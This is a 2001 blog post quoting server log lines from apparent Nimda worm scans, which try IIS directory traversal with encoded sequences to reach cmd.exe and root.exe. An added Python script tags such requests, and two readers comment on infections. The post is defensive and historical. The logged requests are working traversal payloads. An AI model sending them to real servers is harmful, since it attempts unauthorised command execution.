Hit or Miss

From my server logs:

"GET /scripts/root.exe?/c+dir HTTP/1.0"
"GET /MSADC/root.exe?/c+dir HTTP/1.0"
"GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0"
"GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0"
"GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0"
"GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0"
"GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0"
"GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0"
"GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0"
"GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0"

etc…

Is this the work of the Nimda virus? Thank goodness I run Linux.
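Added example, not part of the original post: a small log triage script that tags request lines like the ones above by what makes them suspicious (a second layer of percent-encoding such as %255c, the bytes 0xC0/0xC1 that are never valid in UTF-8, a ".." path segment, and a request for cmd.exe or root.exe). The function names, tag names and the one benign line are assumptions made for illustration; the other sample lines are copied from the excerpt.

```python
import re
from urllib.parse import unquote_to_bytes

# Request lines copied from the log excerpt above, plus one constructed benign line.
SAMPLE = [
    '"GET /scripts/root.exe?/c+dir HTTP/1.0"',
    '"GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0"',
    '"GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0"',
    '"GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0"',
    '"GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0"',
    '"GET /index.html HTTP/1.0"',  # constructed benign request
]

REQUEST = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/\d\.\d"')
PCT = re.compile(rb"%[0-9A-Fa-f]{2}")
SHELLS = (b"cmd.exe", b"root.exe")

def classify(line):
    """Return a sorted list of reason tags for one quoted request line."""
    m = REQUEST.search(line)
    if not m:
        return ["unparsed"]
    path = m.group("target").split("?", 1)[0].encode("latin-1")
    once = unquote_to_bytes(path)            # what a single decode pass yields
    reasons = set()
    if PCT.search(once):                     # still encoded after one pass
        reasons.add("double-encoded")
    if b"\xc0" in once or b"\xc1" in once:   # bytes that never occur in valid UTF-8
        reasons.add("invalid-utf8")
    decoded = once
    for _ in range(3):                       # bounded extra passes to peel nested encoding
        decoded = unquote_to_bytes(decoded)
    if b".." in decoded:
        reasons.add("dot-dot")
    name = decoded.lower().replace(b"\\", b"/").rsplit(b"/", 1)[-1]
    if name in SHELLS:
        reasons.add("shell-binary")
    return sorted(reasons)

def flagged(lines):
    """Map each suspicious line to its reason tags; clean lines are omitted."""
    return {ln: tags for ln in lines if (tags := classify(ln))}

if __name__ == "__main__":
    for ln, tags in flagged(SAMPLE).items():
        print(", ".join(tags), "<-", ln)
```

On a Linux/Apache host these requests simply return 404, so the tags are useful mainly for counting and blocking the scanning sources.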

2 responses so far

Speaking as someone whose machine was trashed by the Nimda virus today… YES. Watch out, it’s a bastard.

Luckily it was just my work machine that got hit. Everything at home was sitting safe behind the firewall. We’ve been seeing similar things pop up in our logs. We’ve had about 300 scans run on it so far. Be vigilant.

Kris | 19 Sep 2001

Yep. Microsoft products suck, huh?

Charles | 19 Sep 2001